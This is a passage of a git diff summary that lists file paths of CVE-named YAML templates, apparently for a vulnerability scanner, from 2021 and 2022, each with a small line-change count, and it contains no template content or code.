http/cves/2021/CVE-2021-24762.yaml | 2 +- http/cves/2021/CVE-2021-24827.yaml | 2 +- http/cves/2021/CVE-2021-24838.yaml | 2 +- http/cves/2021/CVE-2021-24862.yaml | 2 +- http/cves/2021/CVE-2021-24875.yaml | 2 +- http/cves/2021/CVE-2021-24891.yaml | 2 +- http/cves/2021/CVE-2021-24910.yaml | 1 - http/cves/2021/CVE-2021-24917.yaml | 2 +- http/cves/2021/CVE-2021-24926.yaml | 2 +- http/cves/2021/CVE-2021-24931.yaml | 2 +- http/cves/2021/CVE-2021-24940.yaml | 2 +- http/cves/2021/CVE-2021-24946.yaml | 2 +- http/cves/2021/CVE-2021-24947.yaml | 2 +- http/cves/2021/CVE-2021-24970.yaml | 2 +- http/cves/2021/CVE-2021-24987.yaml | 2 +- http/cves/2021/CVE-2021-24991.yaml | 2 +- http/cves/2021/CVE-2021-24997.yaml | 2 +- http/cves/2021/CVE-2021-25003.yaml | 2 +- http/cves/2021/CVE-2021-25008.yaml | 2 +- http/cves/2021/CVE-2021-25028.yaml | 2 +- http/cves/2021/CVE-2021-25033.yaml | 2 +- http/cves/2021/CVE-2021-25052.yaml | 2 +- http/cves/2021/CVE-2021-25055.yaml | 2 +- http/cves/2021/CVE-2021-25063.yaml | 2 +- http/cves/2021/CVE-2021-25067.yaml | 2 +- http/cves/2021/CVE-2021-25074.yaml | 2 +- http/cves/2021/CVE-2021-25075.yaml | 2 +- http/cves/2021/CVE-2021-25085.yaml | 2 +- http/cves/2021/CVE-2021-25099.yaml | 2 +- http/cves/2021/CVE-2021-25104.yaml | 2 +- http/cves/2021/CVE-2021-25111.yaml | 2 +- http/cves/2021/CVE-2021-25112.yaml | 2 +- http/cves/2021/CVE-2021-25114.yaml | 2 +- http/cves/2021/CVE-2021-25118.yaml | 2 +- http/cves/2021/CVE-2021-25120.yaml | 2 +- http/cves/2021/CVE-2021-25281.yaml | 2 +- http/cves/2021/CVE-2021-25296.yaml | 2 +- http/cves/2021/CVE-2021-25297.yaml | 2 +- http/cves/2021/CVE-2021-25298.yaml | 2 +- http/cves/2021/CVE-2021-25299.yaml | 2 +- http/cves/2021/CVE-2021-25646.yaml | 2 +- http/cves/2021/CVE-2021-25864.yaml | 2 +- http/cves/2021/CVE-2021-25899.yaml | 2 +- http/cves/2021/CVE-2021-26084.yaml | 2 +- http/cves/2021/CVE-2021-26085.yaml | 2 +- http/cves/2021/CVE-2021-26086.yaml | 2 +- http/cves/2021/CVE-2021-26247.yaml | 2 +- http/cves/2021/CVE-2021-26295.yaml | 2 +- http/cves/2021/CVE-2021-26475.yaml | 2 +- http/cves/2021/CVE-2021-26598.yaml | 2 +- http/cves/2021/CVE-2021-26702.yaml | 2 +- http/cves/2021/CVE-2021-26710.yaml | 2 +- http/cves/2021/CVE-2021-26723.yaml | 2 +- http/cves/2021/CVE-2021-26812.yaml | 2 +- http/cves/2021/CVE-2021-26855.yaml | 2 +- http/cves/2021/CVE-2021-27132.yaml | 2 +- http/cves/2021/CVE-2021-27309.yaml | 2 +- http/cves/2021/CVE-2021-27310.yaml | 2 +- http/cves/2021/CVE-2021-27330.yaml | 2 +- http/cves/2021/CVE-2021-27358.yaml | 2 +- http/cves/2021/CVE-2021-27519.yaml | 2 +- http/cves/2021/CVE-2021-27520.yaml | 2 +- http/cves/2021/CVE-2021-27561.yaml | 2 +- http/cves/2021/CVE-2021-27651.yaml | 2 +- http/cves/2021/CVE-2021-27748.yaml | 2 +- http/cves/2021/CVE-2021-27850.yaml | 2 +- http/cves/2021/CVE-2021-27905.yaml | 2 +- http/cves/2021/CVE-2021-27909.yaml | 2 +- http/cves/2021/CVE-2021-27931.yaml | 2 +- http/cves/2021/CVE-2021-28073.yaml | 2 +- http/cves/2021/CVE-2021-28149.yaml | 2 +- http/cves/2021/CVE-2021-28150.yaml | 2 +- http/cves/2021/CVE-2021-28151.yaml | 2 +- http/cves/2021/CVE-2021-28164.yaml | 2 +- http/cves/2021/CVE-2021-28169.yaml | 2 +- http/cves/2021/CVE-2021-28377.yaml | 2 +- http/cves/2021/CVE-2021-28419.yaml | 2 +- http/cves/2021/CVE-2021-28854.yaml | 2 +- http/cves/2021/CVE-2021-28918.yaml | 2 +- http/cves/2021/CVE-2021-28937.yaml | 2 +- http/cves/2021/CVE-2021-29156.yaml | 2 +- http/cves/2021/CVE-2021-29203.yaml | 2 +- http/cves/2021/CVE-2021-29441.yaml | 2 +- http/cves/2021/CVE-2021-29442.yaml | 2 +- http/cves/2021/CVE-2021-29484.yaml | 2 +- http/cves/2021/CVE-2021-29490.yaml | 2 +- http/cves/2021/CVE-2021-29505.yaml | 2 +- http/cves/2021/CVE-2021-29622.yaml | 2 +- http/cves/2021/CVE-2021-29625.yaml | 2 +- http/cves/2021/CVE-2021-3002.yaml | 2 +- http/cves/2021/CVE-2021-30049.yaml | 2 +- http/cves/2021/CVE-2021-30128.yaml | 2 +- http/cves/2021/CVE-2021-30134.yaml | 2 +- http/cves/2021/CVE-2021-30151.yaml | 2 +- http/cves/2021/CVE-2021-3017.yaml | 2 +- http/cves/2021/CVE-2021-3019.yaml | 2 +- http/cves/2021/CVE-2021-30213.yaml | 2 +- http/cves/2021/CVE-2021-30461.yaml | 2 +- http/cves/2021/CVE-2021-30497.yaml | 2 +- http/cves/2021/CVE-2021-3110.yaml | 2 +- http/cves/2021/CVE-2021-31195.yaml | 2 +- http/cves/2021/CVE-2021-31249.yaml | 2 +- http/cves/2021/CVE-2021-31250.yaml | 2 +- http/cves/2021/CVE-2021-3129.yaml | 2 +- http/cves/2021/CVE-2021-31537.yaml | 2 +- http/cves/2021/CVE-2021-31581.yaml | 2 +- http/cves/2021/CVE-2021-31589.yaml | 2 +- http/cves/2021/CVE-2021-31602.yaml | 2 +- http/cves/2021/CVE-2021-31682.yaml | 2 +- http/cves/2021/CVE-2021-31755.yaml | 2 +- http/cves/2021/CVE-2021-31805.yaml | 2 +- http/cves/2021/CVE-2021-31856.yaml | 2 +- http/cves/2021/CVE-2021-31862.yaml | 2 +- http/cves/2021/CVE-2021-32030.yaml | 2 +- http/cves/2021/CVE-2021-32172.yaml | 2 +- http/cves/2021/CVE-2021-3223.yaml | 2 +- http/cves/2021/CVE-2021-32305.yaml | 2 +- http/cves/2021/CVE-2021-32618.yaml | 2 +- http/cves/2021/CVE-2021-32682.yaml | 2 +- http/cves/2021/CVE-2021-32789.yaml | 2 +- http/cves/2021/CVE-2021-32819.yaml | 2 +- http/cves/2021/CVE-2021-32820.yaml | 2 +- http/cves/2021/CVE-2021-32853.yaml | 2 +- http/cves/2021/CVE-2021-3293.yaml | 2 +- http/cves/2021/CVE-2021-3297.yaml | 2 +- http/cves/2021/CVE-2021-33044.yaml | 2 +- http/cves/2021/CVE-2021-33221.yaml | 2 +- http/cves/2021/CVE-2021-33357.yaml | 2 +- http/cves/2021/CVE-2021-33544.yaml | 2 +- http/cves/2021/CVE-2021-33564.yaml | 2 +- http/cves/2021/CVE-2021-3374.yaml | 2 +- http/cves/2021/CVE-2021-3377.yaml | 2 +- http/cves/2021/CVE-2021-3378.yaml | 2 +- http/cves/2021/CVE-2021-33807.yaml | 2 +- http/cves/2021/CVE-2021-33851.yaml | 2 +- http/cves/2021/CVE-2021-33904.yaml | 2 +- http/cves/2021/CVE-2021-34370.yaml | 2 +- http/cves/2021/CVE-2021-34429.yaml | 2 +- http/cves/2021/CVE-2021-34473.yaml | 2 +- http/cves/2021/CVE-2021-34621.yaml | 2 +- http/cves/2021/CVE-2021-34640.yaml | 2 +- http/cves/2021/CVE-2021-34643.yaml | 2 +- http/cves/2021/CVE-2021-34805.yaml | 2 +- http/cves/2021/CVE-2021-35250.yaml | 2 +- http/cves/2021/CVE-2021-35265.yaml | 2 +- http/cves/2021/CVE-2021-35336.yaml | 2 +- http/cves/2021/CVE-2021-35380.yaml | 2 +- http/cves/2021/CVE-2021-35464.yaml | 2 +- http/cves/2021/CVE-2021-35488.yaml | 2 +- http/cves/2021/CVE-2021-35587.yaml | 2 +- http/cves/2021/CVE-2021-3577.yaml | 2 +- http/cves/2021/CVE-2021-36260.yaml | 2 +- http/cves/2021/CVE-2021-36356.yaml | 2 +- http/cves/2021/CVE-2021-36380.yaml | 2 +- http/cves/2021/CVE-2021-36450.yaml | 2 +- http/cves/2021/CVE-2021-3654.yaml | 2 +- http/cves/2021/CVE-2021-36580.yaml | 1 - http/cves/2021/CVE-2021-36748.yaml | 2 +- http/cves/2021/CVE-2021-36749.yaml | 2 +- http/cves/2021/CVE-2021-36873.yaml | 2 +- http/cves/2021/CVE-2021-37216.yaml | 2 +- http/cves/2021/CVE-2021-37416.yaml | 2 +- http/cves/2021/CVE-2021-37538.yaml | 2 +- http/cves/2021/CVE-2021-37573.yaml | 2 +- http/cves/2021/CVE-2021-37580.yaml | 2 +- http/cves/2021/CVE-2021-37589.yaml | 2 +- http/cves/2021/CVE-2021-37704.yaml | 2 +- http/cves/2021/CVE-2021-37833.yaml | 2 +- http/cves/2021/CVE-2021-38314.yaml | 2 +- http/cves/2021/CVE-2021-38540.yaml | 2 +- http/cves/2021/CVE-2021-38647.yaml | 2 +- http/cves/2021/CVE-2021-38702.yaml | 2 +- http/cves/2021/CVE-2021-38704.yaml | 2 +- http/cves/2021/CVE-2021-38751.yaml | 2 +- http/cves/2021/CVE-2021-39141.yaml | 2 +- http/cves/2021/CVE-2021-39144.yaml | 2 +- http/cves/2021/CVE-2021-39146.yaml | 2 +- http/cves/2021/CVE-2021-39152.yaml | 2 +- http/cves/2021/CVE-2021-39211.yaml | 2 +- http/cves/2021/CVE-2021-39226.yaml | 2 +- http/cves/2021/CVE-2021-39312.yaml | 2 +- http/cves/2021/CVE-2021-39316.yaml | 2 +- http/cves/2021/CVE-2021-39320.yaml | 2 +- http/cves/2021/CVE-2021-39322.yaml | 2 +- http/cves/2021/CVE-2021-39327.yaml | 2 +- http/cves/2021/CVE-2021-39350.yaml | 2 +- http/cves/2021/CVE-2021-39433.yaml | 2 +- http/cves/2021/CVE-2021-39501.yaml | 2 +- http/cves/2021/CVE-2021-40149.yaml | 2 +- http/cves/2021/CVE-2021-40150.yaml | 2 +- http/cves/2021/CVE-2021-40323.yaml | 2 +- http/cves/2021/CVE-2021-40438.yaml | 2 +- http/cves/2021/CVE-2021-40539.yaml | 2 +- http/cves/2021/CVE-2021-40542.yaml | 2 +- http/cves/2021/CVE-2021-40661.yaml | 2 +- http/cves/2021/CVE-2021-40822.yaml | 2 +- http/cves/2021/CVE-2021-40856.yaml | 2 +- http/cves/2021/CVE-2021-40859.yaml | 2 +- http/cves/2021/CVE-2021-40868.yaml | 2 +- http/cves/2021/CVE-2021-40870.yaml | 2 +- http/cves/2021/CVE-2021-40875.yaml | 2 +- http/cves/2021/CVE-2021-40960.yaml | 2 +- http/cves/2021/CVE-2021-40978.yaml | 2 +- http/cves/2021/CVE-2021-41174.yaml | 2 +- http/cves/2021/CVE-2021-41192.yaml | 2 +- http/cves/2021/CVE-2021-41266.yaml | 2 +- http/cves/2021/CVE-2021-41277.yaml | 2 +- http/cves/2021/CVE-2021-41282.yaml | 2 +- http/cves/2021/CVE-2021-41291.yaml | 2 +- http/cves/2021/CVE-2021-41293.yaml | 2 +- http/cves/2021/CVE-2021-41349.yaml | 2 +- http/cves/2021/CVE-2021-41381.yaml | 2 +- http/cves/2021/CVE-2021-41432.yaml | 2 +- http/cves/2021/CVE-2021-41467.yaml | 2 +- http/cves/2021/CVE-2021-41569.yaml | 2 +- http/cves/2021/CVE-2021-41648.yaml | 2 +- http/cves/2021/CVE-2021-41649.yaml | 2 +- http/cves/2021/CVE-2021-41653.yaml | 2 +- http/cves/2021/CVE-2021-41691.yaml | 2 +- http/cves/2021/CVE-2021-41773.yaml | 2 +- http/cves/2021/CVE-2021-41826.yaml | 2 +- http/cves/2021/CVE-2021-41878.yaml | 2 +- http/cves/2021/CVE-2021-4191.yaml | 2 +- http/cves/2021/CVE-2021-41951.yaml | 2 +- http/cves/2021/CVE-2021-42013.yaml | 2 +- http/cves/2021/CVE-2021-42063.yaml | 2 +- http/cves/2021/CVE-2021-42071.yaml | 2 +- http/cves/2021/CVE-2021-42192.yaml | 2 +- http/cves/2021/CVE-2021-42237.yaml | 2 +- http/cves/2021/CVE-2021-42258.yaml | 2 +- http/cves/2021/CVE-2021-42551.yaml | 2 +- http/cves/2021/CVE-2021-42565.yaml | 2 +- http/cves/2021/CVE-2021-42566.yaml | 2 +- http/cves/2021/CVE-2021-42567.yaml | 2 +- http/cves/2021/CVE-2021-42627.yaml | 2 +- http/cves/2021/CVE-2021-42663.yaml | 2 +- http/cves/2021/CVE-2021-42667.yaml | 2 +- http/cves/2021/CVE-2021-42887.yaml | 2 +- http/cves/2021/CVE-2021-43062.yaml | 2 +- http/cves/2021/CVE-2021-43287.yaml | 2 +- http/cves/2021/CVE-2021-43421.yaml | 2 +- http/cves/2021/CVE-2021-43495.yaml | 2 +- http/cves/2021/CVE-2021-43496.yaml | 2 +- http/cves/2021/CVE-2021-43510.yaml | 2 +- http/cves/2021/CVE-2021-43574.yaml | 2 +- http/cves/2021/CVE-2021-43734.yaml | 2 +- http/cves/2021/CVE-2021-43778.yaml | 2 +- http/cves/2021/CVE-2021-43810.yaml | 2 +- http/cves/2021/CVE-2021-44077.yaml | 2 +- http/cves/2021/CVE-2021-44152.yaml | 2 +- http/cves/2021/CVE-2021-44427.yaml | 2 +- http/cves/2021/CVE-2021-44451.yaml | 2 +- http/cves/2021/CVE-2021-44515.yaml | 2 +- http/cves/2021/CVE-2021-44528.yaml | 2 +- http/cves/2021/CVE-2021-44529.yaml | 2 +- http/cves/2021/CVE-2021-44848.yaml | 2 +- http/cves/2021/CVE-2021-45043.yaml | 2 +- http/cves/2021/CVE-2021-45046.yaml | 2 +- http/cves/2021/CVE-2021-45092.yaml | 2 +- http/cves/2021/CVE-2021-45232.yaml | 2 +- http/cves/2021/CVE-2021-45380.yaml | 2 +- http/cves/2021/CVE-2021-45422.yaml | 2 +- http/cves/2021/CVE-2021-45428.yaml | 2 +- http/cves/2021/CVE-2021-45967.yaml | 1 - http/cves/2021/CVE-2021-45968.yaml | 2 +- http/cves/2021/CVE-2021-46005.yaml | 2 +- http/cves/2021/CVE-2021-46068.yaml | 2 +- http/cves/2021/CVE-2021-46069.yaml | 2 +- http/cves/2021/CVE-2021-46071.yaml | 2 +- http/cves/2021/CVE-2021-46072.yaml | 2 +- http/cves/2021/CVE-2021-46073.yaml | 2 +- http/cves/2021/CVE-2021-46379.yaml | 2 +- http/cves/2021/CVE-2021-46381.yaml | 2 +- http/cves/2021/CVE-2021-46387.yaml | 2 +- http/cves/2021/CVE-2021-46417.yaml | 2 +- http/cves/2021/CVE-2021-46422.yaml | 2 +- http/cves/2021/CVE-2021-46424.yaml | 2 +- http/cves/2022/CVE-2022-0140.yaml | 2 +- http/cves/2022/CVE-2022-0147.yaml | 2 +- http/cves/2022/CVE-2022-0148.yaml | 2 +- http/cves/2022/CVE-2022-0149.yaml | 2 +- http/cves/2022/CVE-2022-0150.yaml | 2 +- http/cves/2022/CVE-2022-0165.yaml | 2 +- http/cves/2022/CVE-2022-0189.yaml | 2 +- http/cves/2022/CVE-2022-0201.yaml | 2 +- http/cves/2022/CVE-2022-0206.yaml | 2 +- http/cves/2022/CVE-2022-0208.yaml | 2 +- http/cves/2022/CVE-2022-0212.yaml | 2 +- http/cves/2022/CVE-2022-0218.yaml | 2 +- http/cves/2022/CVE-2022-0220.yaml | 2 +- http/cves/2022/CVE-2022-0234.yaml | 2 +- http/cves/2022/CVE-2022-0271.yaml | 2 +- http/cves/2022/CVE-2022-0281.yaml | 2 +- http/cves/2022/CVE-2022-0288.yaml | 2 +- http/cves/2022/CVE-2022-0346.yaml | 2 +- http/cves/2022/CVE-2022-0349.yaml | 2 +- http/cves/2022/CVE-2022-0378.yaml | 2 +- http/cves/2022/CVE-2022-0381.yaml | 2 +- http/cves/2022/CVE-2022-0412.yaml | 2 +- http/cves/2022/CVE-2022-0415.yaml | 2 +- http/cves/2022/CVE-2022-0422.yaml | 2 +- http/cves/2022/CVE-2022-0432.yaml | 2 +- http/cves/2022/CVE-2022-0434.yaml | 2 +- http/cves/2022/CVE-2022-0437.yaml | 2 +- http/cves/2022/CVE-2022-0441.yaml | 2 +- http/cves/2022/CVE-2022-0482.yaml | 2 +- http/cves/2022/CVE-2022-0535.yaml | 2 +- http/cves/2022/CVE-2022-0540.yaml | 2 +- http/cves/2022/CVE-2022-0591.yaml | 2 +- http/cves/2022/CVE-2022-0594.yaml | 2 +- http/cves/2022/CVE-2022-0595.yaml | 2 +- http/cves/2022/CVE-2022-0599.yaml | 2 +- http/cves/2022/CVE-2022-0653.yaml | 2 +- http/cves/2022/CVE-2022-0656.yaml | 2 +- http/cves/2022/CVE-2022-0660.yaml | 2 +- http/cves/2022/CVE-2022-0678.yaml | 2 +- http/cves/2022/CVE-2022-0679.yaml | 2 +- http/cves/2022/CVE-2022-0692.yaml | 2 +- http/cves/2022/CVE-2022-0693.yaml | 2 +- http/cves/2022/CVE-2022-0735.yaml | 2 +- http/cves/2022/CVE-2022-0760.yaml | 2 +- http/cves/2022/CVE-2022-0776.yaml | 2 +- http/cves/2022/CVE-2022-0781.yaml | 2 +- http/cves/2022/CVE-2022-0784.yaml | 2 +- http/cves/2022/CVE-2022-0785.yaml | 2 +- http/cves/2022/CVE-2022-0786.yaml | 2 +- http/cves/2022/CVE-2022-0788.yaml | 2 +- http/cves/2022/CVE-2022-0817.yaml | 2 +- http/cves/2022/CVE-2022-0824.yaml | 2 +- http/cves/2022/CVE-2022-0826.yaml | 2 +- http/cves/2022/CVE-2022-0827.yaml | 2 +- http/cves/2022/CVE-2022-0867.yaml | 2 +- http/cves/2022/CVE-2022-0870.yaml | 2 +- http/cves/2022/CVE-2022-0885.yaml | 2 +- http/cves/2022/CVE-2022-0928.yaml | 2 +- http/cves/2022/CVE-2022-0948.yaml | 2 +- http/cves/2022/CVE-2022-0949.yaml | 2 +- http/cves/2022/CVE-2022-0952.yaml | 2 +- http/cves/2022/CVE-2022-0954.yaml | 2 +- http/cves/2022/CVE-2022-0963.yaml | 2 +- http/cves/2022/CVE-2022-0968.yaml | 2 +- http/cves/2022/CVE-2022-1007.yaml | 2 +- http/cves/2022/CVE-2022-1013.yaml | 2 +- http/cves/2022/CVE-2022-1020.yaml | 2 +- http/cves/2022/CVE-2022-1040.yaml | 2 +- http/cves/2022/CVE-2022-1054.yaml | 2 +- http/cves/2022/CVE-2022-1057.yaml | 2 +- http/cves/2022/CVE-2022-1058.yaml | 2 +- http/cves/2022/CVE-2022-1119.yaml | 2 +- http/cves/2022/CVE-2022-1162.yaml | 2 +- http/cves/2022/CVE-2022-1168.yaml | 2 +- http/cves/2022/CVE-2022-1221.yaml | 2 +- http/cves/2022/CVE-2022-1329.yaml | 2 +- http/cves/2022/CVE-2022-1386.yaml | 2 +- http/cves/2022/CVE-2022-1388.yaml | 2 +- http/cves/2022/CVE-2022-1390.yaml | 2 +- http/cves/2022/CVE-2022-1391.yaml | 2 +- http/cves/2022/CVE-2022-1392.yaml | 2 +- http/cves/2022/CVE-2022-1398.yaml | 2 +- http/cves/2022/CVE-2022-1439.yaml | 2 +- http/cves/2022/CVE-2022-1442.yaml | 2 +- http/cves/2022/CVE-2022-1574.yaml | 2 +- http/cves/2022/CVE-2022-1597.yaml | 2 +- http/cves/2022/CVE-2022-1598.yaml | 2 +- http/cves/2022/CVE-2022-1609.yaml | 2 +- http/cves/2022/CVE-2022-1713.yaml | 2 +- http/cves/2022/CVE-2022-1724.yaml | 2 +- http/cves/2022/CVE-2022-1768.yaml | 2 +- http/cves/2022/CVE-2022-1815.yaml | 2 +- http/cves/2022/CVE-2022-1883.yaml | 2 +- http/cves/2022/CVE-2022-1904.yaml | 2 +- http/cves/2022/CVE-2022-1906.yaml | 2 +- http/cves/2022/CVE-2022-1910.yaml | 2 +- http/cves/2022/CVE-2022-1916.yaml | 2 +- http/cves/2022/CVE-2022-1933.yaml | 2 +- http/cves/2022/CVE-2022-1937.yaml | 2 +- http/cves/2022/CVE-2022-1946.yaml | 2 +- http/cves/2022/CVE-2022-1952.yaml | 2 +- http/cves/2022/CVE-2022-2034.yaml | 2 +- http/cves/2022/CVE-2022-21371.yaml | 2 +- http/cves/2022/CVE-2022-21500.yaml | 2 +- http/cves/2022/CVE-2022-21587.yaml | 2 +- http/cves/2022/CVE-2022-21661.yaml | 2 +- http/cves/2022/CVE-2022-21705.yaml | 2 +- http/cves/2022/CVE-2022-2185.yaml | 2 +- http/cves/2022/CVE-2022-2187.yaml | 2 +- http/cves/2022/CVE-2022-22242.yaml | 2 +- http/cves/2022/CVE-2022-22536.yaml | 2 +- http/cves/2022/CVE-2022-2290.yaml | 2 +- http/cves/2022/CVE-2022-22947.yaml | 2 +- http/cves/2022/CVE-2022-22954.yaml | 2 +- http/cves/2022/CVE-2022-22963.yaml | 2 +- http/cves/2022/CVE-2022-22965.yaml | 2 +- http/cves/2022/CVE-2022-22972.yaml | 2 +- http/cves/2022/CVE-2022-23131.yaml | 2 +- http/cves/2022/CVE-2022-23134.yaml | 2 +- http/cves/2022/CVE-2022-2314.yaml | 2 +- http/cves/2022/CVE-2022-23178.yaml | 2 +- http/cves/2022/CVE-2022-23347.yaml | 2 +- http/cves/2022/CVE-2022-23348.yaml | 2 +- http/cves/2022/CVE-2022-2373.yaml | 2 +- http/cves/2022/CVE-2022-2376.yaml | 2 +- http/cves/2022/CVE-2022-23779.yaml | 2 +- http/cves/2022/CVE-2022-2379.yaml | 2 +- http/cves/2022/CVE-2022-23808.yaml | 2 +- http/cves/2022/CVE-2022-2383.yaml | 2 +- http/cves/2022/CVE-2022-23854.yaml | 2 +- http/cves/2022/CVE-2022-23881.yaml | 2 +- http/cves/2022/CVE-2022-23898.yaml | 2 +- http/cves/2022/CVE-2022-23944.yaml | 2 +- http/cves/2022/CVE-2022-24112.yaml | 2 +- http/cves/2022/CVE-2022-24124.yaml | 2 +- http/cves/2022/CVE-2022-24129.yaml | 2 +- http/cves/2022/CVE-2022-24181.yaml | 2 +- http/cves/2022/CVE-2022-24260.yaml | 2 +- http/cves/2022/CVE-2022-24288.yaml | 2 +- http/cves/2022/CVE-2022-2462.yaml | 2 +- http/cves/2022/CVE-2022-2467.yaml | 2 +- http/cves/2022/CVE-2022-24681.yaml | 2 +- http/cves/2022/CVE-2022-24816.yaml | 2 +- http/cves/2022/CVE-2022-24856.yaml | 2 +- http/cves/2022/CVE-2022-2486.yaml | 2 +- http/cves/2022/CVE-2022-2487.yaml | 2 +- http/cves/2022/CVE-2022-2488.yaml | 2 +- http/cves/2022/CVE-2022-24899.yaml | 2 +- http/cves/2022/CVE-2022-24900.yaml | 2 +- http/cves/2022/CVE-2022-24990.yaml | 2 +- http/cves/2022/CVE-2022-25082.yaml | 2 +- http/cves/2022/CVE-2022-25125.yaml | 2 +- http/cves/2022/CVE-2022-25216.yaml | 2 +- http/cves/2022/CVE-2022-25323.yaml | 2 +- http/cves/2022/CVE-2022-25356.yaml | 2 +- http/cves/2022/CVE-2022-25369.yaml | 2 +- http/cves/2022/CVE-2022-2544.yaml | 2 +- http/cves/2022/CVE-2022-2546.yaml | 2 +- http/cves/2022/CVE-2022-2551.yaml | 2 +- http/cves/2022/CVE-2022-2599.yaml | 2 +- http/cves/2022/CVE-2022-26134.yaml | 2 +- http/cves/2022/CVE-2022-26138.yaml | 2 +- http/cves/2022/CVE-2022-26148.yaml | 2 +- http/cves/2022/CVE-2022-26159.yaml | 2 +- http/cves/2022/CVE-2022-26233.yaml | 2 +- http/cves/2022/CVE-2022-26263.yaml | 2 +- http/cves/2022/CVE-2022-2627.yaml | 2 +- http/cves/2022/CVE-2022-2633.yaml | 2 +- http/cves/2022/CVE-2022-26352.yaml | 2 +- http/cves/2022/CVE-2022-26564.yaml | 2 +- http/cves/2022/CVE-2022-26960.yaml | 2 +- http/cves/2022/CVE-2022-2756.yaml | 2 +- http/cves/2022/CVE-2022-27593.yaml | 2 +- http/cves/2022/CVE-2022-27849.yaml | 2 +- http/cves/2022/CVE-2022-27927.yaml | 2 +- http/cves/2022/CVE-2022-28079.yaml | 2 +- http/cves/2022/CVE-2022-28080.yaml | 2 +- http/cves/2022/CVE-2022-28117.yaml | 2 +- http/cves/2022/CVE-2022-28219.yaml | 2 +- http/cves/2022/CVE-2022-28290.yaml | 2 +- http/cves/2022/CVE-2022-28363.yaml | 2 +- http/cves/2022/CVE-2022-28365.yaml | 2 +- http/cves/2022/CVE-2022-2863.yaml | 2 +- http/cves/2022/CVE-2022-28923.yaml | 2 +- http/cves/2022/CVE-2022-28955.yaml | 2 +- http/cves/2022/CVE-2022-29004.yaml | 2 +- http/cves/2022/CVE-2022-29005.yaml | 2 +- http/cves/2022/CVE-2022-29006.yaml | 2 +- http/cves/2022/CVE-2022-29007.yaml | 2 +- http/cves/2022/CVE-2022-29009.yaml | 2 +- http/cves/2022/CVE-2022-29014.yaml | 2 +- http/cves/2022/CVE-2022-29078.yaml | 2 +- http/cves/2022/CVE-2022-29272.yaml | 2 +- http/cves/2022/CVE-2022-29298.yaml | 2 +- http/cves/2022/CVE-2022-29299.yaml | 2 +- http/cves/2022/CVE-2022-29301.yaml | 2 +- http/cves/2022/CVE-2022-29303.yaml | 2 +- http/cves/2022/CVE-2022-29349.yaml | 2 +- http/cves/2022/CVE-2022-29383.yaml | 2 +- http/cves/2022/CVE-2022-29455.yaml | 2 +- http/cves/2022/CVE-2022-29464.yaml | 2 +- http/cves/2022/CVE-2022-29548.yaml | 2 +- http/cves/2022/CVE-2022-29775.yaml | 2 +- http/cves/2022/CVE-2022-30073.yaml | 2 +- http/cves/2022/CVE-2022-30489.yaml | 2 +- http/cves/2022/CVE-2022-30512.yaml | 2 +- http/cves/2022/CVE-2022-30513.yaml | 2 +- http/cves/2022/CVE-2022-30514.yaml | 2 +- http/cves/2022/CVE-2022-30525.yaml | 2 +- http/cves/2022/CVE-2022-30776.yaml | 2 +- http/cves/2022/CVE-2022-30777.yaml | 2 +- http/cves/2022/CVE-2022-31126.yaml | 2 +- http/cves/2022/CVE-2022-31268.yaml | 2 +- http/cves/2022/CVE-2022-31269.yaml | 2 +- http/cves/2022/CVE-2022-31299.yaml | 2 +- http/cves/2022/CVE-2022-31373.yaml | 2 +- http/cves/2022/CVE-2022-31474.yaml | 2 +- http/cves/2022/CVE-2022-31499.yaml | 2 +- http/cves/2022/CVE-2022-31656.yaml | 2 +- http/cves/2022/CVE-2022-31798.yaml | 2 +- http/cves/2022/CVE-2022-31814.yaml | 2 +- http/cves/2022/CVE-2022-31845.yaml | 2 +- http/cves/2022/CVE-2022-31846.yaml | 2 +- http/cves/2022/CVE-2022-31847.yaml | 2 +- http/cves/2022/CVE-2022-31854.yaml | 2 +- http/cves/2022/CVE-2022-32007.yaml | 2 +- http/cves/2022/CVE-2022-32015.yaml | 2 +- http/cves/2022/CVE-2022-32018.yaml | 2 +- http/cves/2022/CVE-2022-32022.yaml | 2 +- http/cves/2022/CVE-2022-32024.yaml | 2 +- http/cves/2022/CVE-2022-32025.yaml | 2 +- http/cves/2022/CVE-2022-32026.yaml | 2 +- http/cves/2022/CVE-2022-32028.yaml | 2 +- http/cves/2022/CVE-2022-32094.yaml | 2 +- http/cves/2022/CVE-2022-32195.yaml | 2 +- http/cves/2022/CVE-2022-32409.yaml | 2 +- http/cves/2022/CVE-2022-32429.yaml | 2 +- http/cves/2022/CVE-2022-32444.yaml | 2 +- http/cves/2022/CVE-2022-32770.yaml | 2 +- http/cves/2022/CVE-2022-32771.yaml | 2 +- http/cves/2022/CVE-2022-32772.yaml | 2 +- http/cves/2022/CVE-2022-33119.yaml | 2 +- http/cves/2022/CVE-2022-33174.yaml | 2 +- http/cves/2022/CVE-2022-33891.yaml | 2 +- http/cves/2022/CVE-2022-33901.yaml | 2 +- http/cves/2022/CVE-2022-33965.yaml | 2 +- http/cves/2022/CVE-2022-34045.yaml | 2 +- http/cves/2022/CVE-2022-34046.yaml | 2 +- http/cves/2022/CVE-2022-34047.yaml | 2 +- http/cves/2022/CVE-2022-34048.yaml | 2 +- http/cves/2022/CVE-2022-34049.yaml | 2 +- http/cves/2022/CVE-2022-34121.yaml | 2 +- http/cves/2022/CVE-2022-34328.yaml | 2 +- http/cves/2022/CVE-2022-34576.yaml | 2 +- http/cves/2022/CVE-2022-34590.yaml | 2 +- http/cves/2022/CVE-2022-34753.yaml | 2 +- http/cves/2022/CVE-2022-3484.yaml | 2 +- http/cves/2022/CVE-2022-3506.yaml | 2 +- http/cves/2022/CVE-2022-35151.yaml | 2 +- http/cves/2022/CVE-2022-35405.yaml | 2 +- http/cves/2022/CVE-2022-35413.yaml | 2 +- http/cves/2022/CVE-2022-35416.yaml | 2 +- http/cves/2022/CVE-2022-35493.yaml | 2 +- http/cves/2022/CVE-2022-3578.yaml | 2 +- http/cves/2022/CVE-2022-35914.yaml | 2 +- http/cves/2022/CVE-2022-36446.yaml | 2 +- http/cves/2022/CVE-2022-36537.yaml | 2 +- http/cves/2022/CVE-2022-36642.yaml | 2 +- http/cves/2022/CVE-2022-36804.yaml | 2 +- http/cves/2022/CVE-2022-36883.yaml | 2 +- http/cves/2022/CVE-2022-37042.yaml | 1 - http/cves/2022/CVE-2022-37153.yaml | 2 +- http/cves/2022/CVE-2022-37299.yaml | 2 +- http/cves/2022/CVE-2022-3768.yaml | 2 +- http/cves/2022/CVE-2022-3800.yaml | 2 +- http/cves/2022/CVE-2022-38463.yaml | 2 +- http/cves/2022/CVE-2022-38553.yaml | 2 +- http/cves/2022/CVE-2022-38637.yaml | 2 +- 